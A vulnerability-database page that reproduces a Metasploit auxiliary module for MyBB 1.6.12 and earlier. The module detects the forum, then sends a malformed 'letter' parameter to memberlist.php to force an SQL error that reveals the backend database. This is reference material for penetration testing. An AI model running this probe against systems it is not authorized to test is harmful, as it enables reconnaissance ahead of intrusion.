Lucene search
K

MyBB Database Fingerprint

🗓️ 27 May 2014 15:15:39Reported by Arthur Karmanovskii <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 26 Views

This module checks for MyBB behind a URL, forces an error, and fingerprints the backend database used by MyBB

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'MyBB Database Fingerprint',
      'Description' => %q{
        This module checks if MyBB is running behind an URL. Also uses a malformed query to
        force an error and fingerprint the backend database used by MyBB on version 1.6.12
        and prior.
      },
      'Author'      =>
        [
          #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
          'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module
        ],
      'License'     => MSF_LICENSE,
      'DisclosureDate' => '2014-02-13'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum'])
      ])
  end

  def check
  begin
    uri = normalize_uri(target_uri.path, 'index.php')
    res = send_request_cgi(
      {
        'method'  => 'GET',
        'uri'     => uri,
        'vars_get' => {
          'intcheck' => 1
          }
      })

    if res.nil? || res.code != 200
      return Exploit::CheckCode::Unknown
    end

    # Check PhP
    php_version = res['X-Powered-By']
    if php_version
      php_version = "#{php_version}"
    else
      php_version = "PHP version unknown"
    end

    # Check Web-Server
    web_server = res['Server']
    if web_server
      web_server = "#{web_server}"
    else
      web_server = "unknown web server"
    end

    # Check forum MyBB
    if res.body.match("&#077;&#089;&#066;&#066;")
      print_good("MyBB forum found running on #{web_server} / #{php_version}")
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  rescue
    return Exploit::CheckCode::Unknown
  end

  end


  def run
    print_status("Checking MyBB...")
    unless check == Exploit::CheckCode::Detected
      print_error("MyBB not found")
      return
    end

    print_status("Checking database...")
    uri = normalize_uri(target_uri.path, 'memberlist.php')
    response = send_request_cgi(
      {
        'method'  => 'GET',
        'uri'     => uri,
        'vars_get' => {
          'letter' => -1
          }
      })
    if response.nil?
      print_error("Timeout...")
      return
    end

    # Resolve response
    if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
      print_good("Running PostgreSQL Database")
    elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
      print_good("Running SQLite Database")
    else
      print_status("Running MySQL or unknown database")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation